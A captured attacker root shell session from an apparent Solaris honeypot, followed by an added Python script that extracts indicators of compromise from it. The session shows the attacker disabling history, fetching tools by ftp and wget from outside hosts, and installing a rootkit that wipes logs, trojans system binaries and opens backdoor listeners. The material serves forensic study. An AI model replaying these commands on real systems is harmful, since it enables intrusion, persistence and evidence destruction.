The commands the attacker gave after the break-in. In the original rendering the attacker's commands are shown in red; that colouring is lost in this plain-text copy, where the attacker's input appears after the `# ` root prompt or, inside the ftp session and the rootkit installer's prompts, as bare input lines.
# uname -a;ls -l /core /var/dt/tmp/DTSPCD.log;PATH=/usr/local/bin:/usr/bin:/bin:/usr/sbin:/sbin:/usr/ccs/bin:/usr/gnu/bin;export PATH;echo "BD PID(s): "`ps -fed|grep ' -s /tmp/x'|grep -v grep|awk '{print $2}'`
SunOS zoberius 5.8 Generic_108528-09 sun4u sparc SUNW,Ultra-5_10
/core: No such file or directory
/var/dt/tmp/DTSPCD.log: No such file or directory
BD PID(s): 1773
# wget
wget: not found
# w
9:44am up 13 day(s), 4:24, 0 users, load average: 0.00, 0.00, 0.01
User tty login@ idle JCPU PCPU what
# /bin/sh -i
unset HISTFILE
# unset DISPLAY
mkdir /usr/share/man/man1/.old
cd /usr/share/man/man1/.old
# # # ftp 62.211.66.16 21
bobzz
ftp: ioctl(TIOCGETP): Invalid argument
Password:joka
get wget
get dlp
get solbnc
get iupv6sun
Name (62.211.66.16:root): iupv6sun: No such file or directory.
get ipv6sun
quit
# ls
dlp
ipv6sun
solbnc
wget
# chmod +x solbnc wget dlp
# ./wget
wget: missing URL
Usage: wget [OPTION]... [URL]...
Try `wget --help' for more options.
# ./wget http://62.211.66.53/bobzz/sol.tar.gz
--09:47:58-- http://62.211.66.53:80/bobzz/sol.tar.gz
=> `sol.tar.gz'
Connecting to 62.211.66.53:80... connected!
HTTP request sent, awaiting response... 200 OK
Length: 1,884,160 [application/x-tar]
0K -> .......... .......... .......... .......... .......... [ 2%]
50K -> .......... .......... .......... .......... .......... [ 5%]
100K -> .......... .......... .......... .......... .......... [ 8%]
150K -> .......... .......... .......... .......... .......... [ 10%]
200K -> .......... .......... .......... .......... .......... [ 13%]
250K -> .......... .......... .......... .......... .......... [ 16%]
300K -> .......... .......... .......... .......... .......... [ 19%]
350K -> .......... .......... .......... .......... .......... [ 21%]
400K -> .......... .......... .......... .......... .......... [ 24%]
450K -> .......... .......... .......... .......... .......... [ 27%]
500K -> .......... .......... .......... .......... .......... [ 29%]
550K -> .......... .......... .......... .......... .......... [ 32%]
600K -> .......... .......... .......... .......... .......... [ 35%]
650K -> .......... .......... .......... .......... .......... [ 38%]
700K -> .......... .......... .......... .......... .......... [ 40%]
750K -> .......... .......... .......... .......... .......... [ 43%]
800K -> .......... .......... .......... .......... .......... [ 46%]
850K -> .......... .......... .......... .......... .......... [ 48%]
900K -> .......... .......... .......... .......... .......... [ 51%]
950K -> .......... .......... .......... .......... .......... [ 54%]
1000K -> .......... .......... .......... .......... .......... [ 57%]
1050K -> .......... .......... .......... .......... .......... [ 59%]
1100K -> .......... .......... .......... .......... .......... [ 62%]
1150K -> .......... .......... .......... .......... .......... [ 65%]
1200K -> .......... .......... .......... .......... .......... [ 67%]
1250K -> .......... .......... .......... .......... .......... [ 70%]
1300K -> .......... .......... .......... .......... .......... [ 73%]
1350K -> .......... .......... .......... .......... .......... [ 76%]
1400K -> .......... .......... .......... .......... .......... [ 78%]
1450K -> .......... .......... .......... .......... .......... [ 81%]
1500K -> .......... .......... .......... .......... .......... [ 84%]
1550K -> .......... .......... .......... .......... .......... [ 86%]
1600K -> .......... .......... .......... .......... .......... [ 89%]
1650K -> .......... .......... .......... .......... .......... [ 92%]
1700K -> .......... .......... .......... .......... .......... [ 95%]
1750K -> .......... .......... .......... .......... .......... [ 97%]
1800K -> .......... .......... .......... .......... [100%]
09:55:09 (4.27 KB/s) - `sol.tar.gz' saved [1884160/1884160]
# rrrrrretar -xf sol.tar.gz
rrrrrretar: not found
# cd sol
sol: does not exist
# ./setup
./setup: not found
# cd sol
sol: does not exist
# tar -xf sol.tar.gz
# cd sol
# ./setup
[0;36mbobz oN ircNet on join #privè
/\ /\
_/ \ ___| Autor: bobz |___ / \_
\ / \ /
\/ \/
********
******** ** ** **
** ** ** * *
******* ********** ** ** * *
******* ** ** ****** ********
** ** ** ****** **********
******* ** ** ** ** ** **
******* ** ** ** ** ** **
********** ** ** ** **
/\ /\
_/ \ ___| Autor: bobz |___ / \_
\ / \ /
\/ \/
...:::[ Autore bobz ]:::...
...:::[ On IRcnEt On Join #bobz ]:::...
Ti:AmO:RosariADelete Logz...
-------
Deleting /var/log...
/var/log/secure: No such file or directory
/var/log/secure.1: No such file or directory
/var/log/secure.2: No such file or directory
/var/log/secure.3: No such file or directory
/var/log/secure.4: No such file or directory
/var/log/boot.log: No such file or directory
/var/log/boot.log.1: No such file or directory
/var/log/boot.log.2: No such file or directory
/var/log/boot.log.3: No such file or directory
/var/log/boot.log.4: No such file or directory
/var/log/cron: No such file or directory
/var/log/cron.1: No such file or directory
/var/log/cron.2: No such file or directory
/var/log/cron.3: No such file or directory
/var/log/cron.4: No such file or directory
/var/log/lastlog: No such file or directory
/var/log/xferlog: No such file or directory
/var/log/xferlog.1: No such file or directory
/var/log/xferlog.2: No such file or directory
/var/log/xferlog.3: No such file or directory
/var/log/xferlog.4: No such file or directory
/var/log/wtmp: No such file or directory
/var/log/wtmp.1: No such file or directory
/var/log/spooler: No such file or directory
/var/log/spooler.1: No such file or directory
/var/log/spooler.2: No such file or directory
/var/log/spooler.3: No such file or directory
/var/log/spooler.4: No such file or directory
---
LogZ Cancellati...
Delete LogZ by warning
[1;37m*[0;37m Starting up at: [0;36m1038585350[0;37m
[1;37m*[0;37m Installing from /usr/share/man/man1/.old/sol - Will erase /usr/share/man/man1/.old/sol after install
[1;37m*[0;37m Checking for existing rootkits..
[1;37m*[0;37m Checking for existing rootkits..
[1;37m*[0;37m checking /etc/rc2 and /etc/rc3 for rootkits...
[1;37m*[0;37m Rootkits Removed from config files
[1;37m*[0;37m checking crond configs for rootkits...
[1;37m*[0;37m Rootkits Removed from crond config files
[1;31m*** WARNING ***[0;37m 2 suspicious files found in /dev
[1;37m***[0;37m Insert Rootkit Password :
mixer
[1;37m***[0;37m Using Password mixer
[1;37m***[0;37m Insert Rootkit SSH Port :
5001
[1;37m***[0;37m Using Port 5001
[1;37m***[0;37m Insert Rootkit PsyBNC Port :
7000
[1;37m***[0;37m Using Port 7000
File processed...
[1;37m*[0;37m Making backups... su ping du passwd find ls netstat strings ps Done.
[1;37m*[0;37m Installing trojans... login sshd netstat ls find strings du passwd ping su Complete.
[1;37m*[0;37m Suid removal at atq atrm eject fdformat rdist rdist admintool ufsdump ufsrestore quota ff.core lpset lpstat netpr arp chkperm Complete.
[1;37m*[0;37m Starting Patcher...
* Patching...
DTSCD PATCHED
LPD PATCHED
fingerd
cmsd
ttdbserverd
sadmind
statd
rquotad
rusersd
cachefsd
bindshells
snmpXdmid
Done.
--09:56:21-- ftp://sunsolve.sun.com:21/pub/patches/111085-02.zip
=> `111085-02.zip'
Connecting to sunsolve.sun.com:21... connected!
Logging in as anonymous ... Logged in!
==> TYPE I ... done. ==> CWD pub/patches ... done.
==> PORT ... done. ==> RETR 111085-02.zip ... done.
Length: 27,300 (unauthoritative)
0K -> .......... .......... ...... [100%]
09:56:45 (1.83 KB/s) - `111085-02.zip' saved [27300]
Archive: 111085-02.zip
creating: 111085-02/
inflating: 111085-02/.diPatch
creating: 111085-02/SUNWcsu/
inflating: 111085-02/SUNWcsu/pkgmap
inflating: 111085-02/SUNWcsu/pkginfo
creating: 111085-02/SUNWcsu/install/
inflating: 111085-02/SUNWcsu/install/checkinstall
inflating: 111085-02/SUNWcsu/install/copyright
inflating: 111085-02/SUNWcsu/install/i.none
inflating: 111085-02/SUNWcsu/install/patch_checkinstall
inflating: 111085-02/SUNWcsu/install/patch_postinstall
inflating: 111085-02/SUNWcsu/install/postinstall
inflating: 111085-02/SUNWcsu/install/preinstall
creating: 111085-02/SUNWcsu/reloc/
creating: 111085-02/SUNWcsu/reloc/usr/
creating: 111085-02/SUNWcsu/reloc/usr/bin/
inflating: 111085-02/SUNWcsu/reloc/usr/bin/login
inflating: 111085-02/README.111085-02
Copyright 2001 Sun Microsystems, Inc. All rights reserved.
This appears to be an attempt to install the same architecture and
version of a package which is already installed. This installation
will attempt to overwrite this package.
PaTcH_MsG 2 Patch number 111085-02 is already applied.
Installation of was suspended (administration).
No changes were made to the system.
--09:56:49-- ftp://sunsolve.sun.com:21/pub/patches/108949-07.zip
=> `108949-07.zip'
Connecting to sunsolve.sun.com:21... connected!
Logging in as anonymous ... Logged in!
==> TYPE I ... done. ==> CWD pub/patches ... done.
==> PORT ... done. ==> RETR 108949-07.zip ... done.
Length: 1,033,092 (unauthoritative)
0K -> .......... .......... .......... .......... .......... [ 4%]
50K -> .......... .......... .......... .......... .......... [ 9%]
100K -> .......... .......... .......... .......... .......... [ 14%]
150K -> .......... .......... .......... .......... .......... [ 19%]
200K -> .......... .......... .......... .......... .......... [ 24%]
250K -> .......... .......... .......... .......... .......... [ 29%]
300K -> .......... .......... .......... .......... .......... [ 34%]
350K -> .......... .......... .......... .......... .......... [ 39%]
400K -> .......... .......... .......... .......... .......... [ 44%]
450K -> .......... .......... .......... .......... .......... [ 49%]
500K -> .......... .......... .......... .......... .......... [ 54%]
550K -> .......... .......... .......... .......... .......... [ 59%]
600K -> .......... .......... .......... .......... .......... [ 64%]
650K -> .......... .......... .......... .......... .......... [ 69%]
700K -> .......... .......... .......... .......... .......... [ 74%]
750K -> .......... .......... .......... .......... .......... [ 79%]
800K -> .......... .......... .......... .......... .......... [ 84%]
850K -> .......... .......... .......... .......... .......... [ 89%]
900K -> .......... .......... .......... .......... .......... [ 94%]
950K -> .......... .......... .......... .......... .......... [ 99%]
1000K -> ........ [100%]
10:01:00 (4.20 KB/s) - `108949-07.zip' saved [1033092]
Archive: 108949-07.zip
creating: 108949-07/
inflating: 108949-07/.diPatch
inflating: 108949-07/postbackout
creating: 108949-07/SUNWdtbas/
inflating: 108949-07/SUNWdtbas/pkgmap
inflating: 108949-07/SUNWdtbas/pkginfo
creating: 108949-07/SUNWdtbas/install/
inflating: 108949-07/SUNWdtbas/install/checkinstall
inflating: 108949-07/SUNWdtbas/install/copyright
inflating: 108949-07/SUNWdtbas/install/depend
inflating: 108949-07/SUNWdtbas/install/i.none
inflating: 108949-07/SUNWdtbas/install/patch_checkinstall
inflating: 108949-07/SUNWdtbas/install/patch_postinstall
inflating: 108949-07/SUNWdtbas/install/postinstall
inflating: 108949-07/SUNWdtbas/install/preinstall
creating: 108949-07/SUNWdtbas/reloc/
creating: 108949-07/SUNWdtbas/reloc/dt/
creating: 108949-07/SUNWdtbas/reloc/dt/lib/
inflating: 108949-07/SUNWdtbas/reloc/dt/lib/libDtHelp.so.1
inflating: 108949-07/SUNWdtbas/reloc/dt/lib/libDtSvc.so.1
creating: 108949-07/SUNWdtbax/
inflating: 108949-07/SUNWdtbax/pkgmap
inflating: 108949-07/SUNWdtbax/pkginfo
creating: 108949-07/SUNWdtbax/install/
inflating: 108949-07/SUNWdtbax/install/checkinstall
inflating: 108949-07/SUNWdtbax/install/copyright
inflating: 108949-07/SUNWdtbax/install/depend
inflating: 108949-07/SUNWdtbax/install/i.none
inflating: 108949-07/SUNWdtbax/install/patch_checkinstall
inflating: 108949-07/SUNWdtbax/install/patch_postinstall
inflating: 108949-07/SUNWdtbax/install/postinstall
inflating: 108949-07/SUNWdtbax/install/preinstall
creating: 108949-07/SUNWdtbax/reloc/
creating: 108949-07/SUNWdtbax/reloc/dt/
creating: 108949-07/SUNWdtbax/reloc/dt/lib/
creating: 108949-07/SUNWdtbax/reloc/dt/lib/sparcv9/
inflating: 108949-07/SUNWdtbax/reloc/dt/lib/sparcv9/libDtHelp.so.1
inflating: 108949-07/SUNWdtbax/reloc/dt/lib/sparcv9/libDtSvc.so.1
inflating: 108949-07/postpatch
inflating: 108949-07/README.108949-07
Copyright 2001 Sun Microsystems, Inc. All rights reserved.
This appears to be an attempt to install the same architecture and
version of a package which is already installed. This installation
will attempt to overwrite this package.
Installation of was successful.
Copyright 2001 Sun Microsystems, Inc. All rights reserved.
This appears to be an attempt to install the same architecture and
version of a package which is already installed. This installation
will attempt to overwrite this package.
Installation of was successful.
Archive: 111606-02.zip
creating: 111606-02/
inflating: 111606-02/.diPatch
creating: 111606-02/SUNWftpu/
inflating: 111606-02/SUNWftpu/pkgmap
inflating: 111606-02/SUNWftpu/pkginfo
creating: 111606-02/SUNWftpu/install/
inflating: 111606-02/SUNWftpu/install/checkinstall
inflating: 111606-02/SUNWftpu/install/copyright
inflating: 111606-02/SUNWftpu/install/i.none
inflating: 111606-02/SUNWftpu/install/patch_checkinstall
inflating: 111606-02/SUNWftpu/install/patch_postinstall
inflating: 111606-02/SUNWftpu/install/postinstall
inflating: 111606-02/SUNWftpu/install/preinstall
creating: 111606-02/SUNWftpu/reloc/
creating: 111606-02/SUNWftpu/reloc/usr/
creating: 111606-02/SUNWftpu/reloc/usr/sbin/
inflating: 111606-02/SUNWftpu/reloc/usr/sbin/in.ftpd
inflating: 111606-02/README.111606-02
Copyright 2001 Sun Microsystems, Inc. All rights reserved.
This appears to be an attempt to install the same architecture and
version of a package which is already installed. This installation
will attempt to overwrite this package.
Installation of was successful.
PS Trojaned[1;37m*[0;37m Primary network interface is of type: [0;36mhme[0;37m
[1;37m*[0;37m Copying utils.. passgen fixer wipe utime crt idstart ssh-dxe syn README Done.
[1;37m*[0;37m psyBNC has now been configured on port 7000 (default) with no IDENT
[1;37m*[0;37m erasing rootkit...
./setup: test: unknown operator 16
# ./startbnc
.-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-.
,----.,----.,-. ,-.,---.,--. ,-.,----.
| O || ,-' \ \/ / | o || \| || ,--'
| _/ _\ \ \ / | o< | |\ || |__
|_| |____/ |__| |___||_| \_| \___|
Version 2.2.1 (c) 1999-2000
the most psychoid
and the cool lam3rz Group IRCnet
`-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=tCl=-'
Configuration File: psybnc.conf
No logfile specified, logging to log/psybnc.log
Listening on: 0.0.0.0 port 7000
psyBNC2.2.1-cBtITLdDMSNp started (PID 3262)
^[[1;37m*^[[0;37m psyBNC installed - loaded on reboot :>
# cd ..
# ./solbnc
# ./dlp
Delete LogZ by bobbino
-------
Deleting /var/log...
/var/log/secure: No such file or directory
/var/log/secure.1: No such file or directory
/var/log/secure.2: No such file or directory
/var/log/secure.3: No such file or directory
/var/log/secure.4: No such file or directory
/var/log/boot.log: No such file or directory
/var/log/boot.log.1: No such file or directory
/var/log/boot.log.2: No such file or directory
/var/log/boot.log.3: No such file or directory
/var/log/boot.log.4: No such file or directory
/var/log/cron: No such file or directory
/var/log/cron.1: No such file or directory
/var/log/cron.2: No such file or directory
/var/log/cron.3: No such file or directory
/var/log/cron.4: No such file or directory
/var/log/lastlog: No such file or directory
/var/log/xferlog: No such file or directory
/var/log/xferlog.1: No such file or directory
/var/log/xferlog.2: No such file or directory
/var/log/xferlog.3: No such file or directory
/var/log/xferlog.4: No such file or directory
/var/log/wtmp: No such file or directory
/var/log/wtmp.1: No such file or directory
/var/log/spooler: No such file or directory
/var/log/spooler.1: No such file or directory
/var/log/spooler.2: No such file or directory
/var/log/spooler.3: No such file or directory
/var/log/spooler.4: No such file or directory
---
LogZ Cancellati...
Delete LogZ by bobbino
root 167 1 0 Nov 16 ? 0:00 /usr/sbin/inetd -s
root 3325 3265 0 10:02:25 ? 0:00 grep inetd
---
Patch.....
Attivata by RyO
# #
This extract was created with Ethereal using its Follow TCP Stream tool.
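A parser for this kind of capture, added here as an example; it is not part of the Honeynet capture, of Ethereal, or of any tool the attacker used. It walks the session once and pulls out what a responder acts on: the backdoor PID the attacker checked for, the hidden staging directory, the two remote hosts and the files fetched from them, the ftp credentials the attacker leaked by typing them into a cleartext session, the rootkit password and the SSH and psyBNC listener ports, the binaries the installer replaced, and the SUID bits it stripped. `SESSION` is an excerpt of the session above with the colour codes left as captured (the ESC byte is missing, as on this page); the regular expressions are assumptions about the output format of this particular setup script, ftp(1) and wget, and `untrusted_tools` is a hypothetical helper that flags, in a planned triage command, any tool the rootkit trojaned so that it is run from known-good media instead.

```python
"""Pull indicators of compromise out of a captured attacker shell session.

Added example for this page; not part of the Honeynet capture or of any tool
in it.  SESSION is an excerpt of the session shown above, colour codes left as
captured (ESC byte missing).  The regular expressions are assumptions about the
output of this rootkit's setup script, ftp(1) and wget; other kits differ.
"""
import re

ANSI = re.compile(r"\x1b?\[[0-9;]*m")   # SGR colour codes, with or without ESC
PROMPT = re.compile(r"^(?:#\s*)+")       # root prompt, including a pasted "# # #"

SESSION = """\
# uname -a;echo "BD PID(s): "`ps -fed|grep ' -s /tmp/x'|grep -v grep|awk '{print $2}'`
BD PID(s): 1773
# /bin/sh -i
unset HISTFILE
mkdir /usr/share/man/man1/.old
# # # ftp 62.211.66.16 21
bobzz
ftp: ioctl(TIOCGETP): Invalid argument
Password:joka
get wget
get dlp
get solbnc
quit
# ./wget http://62.211.66.53/bobzz/sol.tar.gz
--09:47:58-- http://62.211.66.53:80/bobzz/sol.tar.gz
# ./setup
Deleting /var/log...
[1;37m***[0;37m Insert Rootkit Password :
mixer
[1;37m***[0;37m Using Password mixer
[1;37m***[0;37m Insert Rootkit SSH Port :
5001
[1;37m***[0;37m Using Port 5001
[1;37m***[0;37m Insert Rootkit PsyBNC Port :
7000
[1;37m***[0;37m Using Port 7000
[1;37m*[0;37m Making backups... su ping du passwd find ls netstat strings ps Done.
[1;37m*[0;37m Installing trojans... login sshd netstat ls find strings du passwd ping su Complete.
[1;37m*[0;37m Suid removal at atq atrm eject fdformat rdist rdist admintool ufsdump ufsrestore quota ff.core lpset lpstat netpr arp chkperm Complete.
psyBNC2.2.1-cBtITLdDMSNp started (PID 3262)
"""


def extract_iocs(session):
    """One pass over the session; returns a dict of indicators."""
    iocs = {"backdoor_pids": [], "staging_dir": None, "remote_hosts": set(),
            "ftp_credentials": None, "downloaded": [], "rootkit_password": None,
            "listeners": {}, "trojaned": set(), "suid_stripped": [],
            "history_disabled": False, "log_wiping": False, "psybnc_pid": None}
    ftp_user, expect_user, pending = None, False, None
    for raw in session.splitlines():
        line = PROMPT.sub("", ANSI.sub("", raw)).strip()
        if not line:
            continue
        if expect_user:                     # line typed right after "ftp host" is the login name
            ftp_user, expect_user = line, False
        elif (m := re.match(r"ftp\s+(\S+)", line)):
            iocs["remote_hosts"].add(m.group(1)); expect_user = True
        elif (m := re.match(r"Password:(\S+)", line)):   # ftp echoed the password
            iocs["ftp_credentials"] = (ftp_user, m.group(1))
        elif (m := re.match(r"get\s+(\S+)", line)):
            iocs["downloaded"].append(m.group(1))
        elif (m := re.search(r"wget\s+https?://([^/\s]+)/\S*?([^/\s]+)$", line)):
            iocs["remote_hosts"].add(m.group(1)); iocs["downloaded"].append(m.group(2))
        elif (m := re.match(r"mkdir\s+(\S+)", line)):
            iocs["staging_dir"] = m.group(1)
        elif line == "unset HISTFILE":
            iocs["history_disabled"] = True
        elif (m := re.match(r"BD PID\(s\):\s*(\d+)", line)):
            iocs["backdoor_pids"].append(int(m.group(1)))
        elif line.startswith("Deleting /var/log"):
            iocs["log_wiping"] = True
        elif (m := re.search(r"Insert Rootkit (\w+) Port", line)):
            pending = m.group(1)            # the next "Using Port" belongs to this service
        elif (m := re.search(r"Using Port (\d+)", line)) and pending:
            iocs["listeners"][pending] = int(m.group(1)); pending = None
        elif (m := re.search(r"Using Password (\S+)", line)):
            iocs["rootkit_password"] = m.group(1)
        elif (m := re.search(r"(?:Making backups|Installing trojans)\.\.\.\s*(.*?)\s*(?:Done|Complete)\.", line)):
            iocs["trojaned"].update(m.group(1).split())   # union of both lists: ps is only in the first
        elif (m := re.search(r"Suid removal at\s*(.*?)\s*Complete\.", line)):
            iocs["suid_stripped"] = sorted(set(m.group(1).split()))
        elif (m := re.search(r"psyBNC\S* started \(PID (\d+)\)", line)):
            iocs["psybnc_pid"] = int(m.group(1))
    return iocs


def untrusted_tools(iocs, command):
    """Hypothetical helper: names in a shell pipeline that the rootkit replaced.
    Their output from the compromised host cannot be believed; run copies from
    known-good media instead."""
    words = re.split(r"[\s|;&]+", command)
    return sorted({w.rsplit("/", 1)[-1] for w in words if w.rsplit("/", 1)[-1] in iocs["trojaned"]})


IOCS = extract_iocs(SESSION)

if __name__ == "__main__":
    for key, value in IOCS.items():
        print(f"{key:18} {sorted(value) if isinstance(value, set) else value}")
    print("do not trust:", untrusted_tools(IOCS, "ps -ef | netstat -an | ls -la /tmp"))
```

The union of the "Making backups" and "Installing trojans" lists matters: `ps` appears only in the first, yet the installer later prints "PS Trojaned", so a parser that reads only the trojan line would leave a responder trusting the very `ps` output the attacker used to find the backdoor PID.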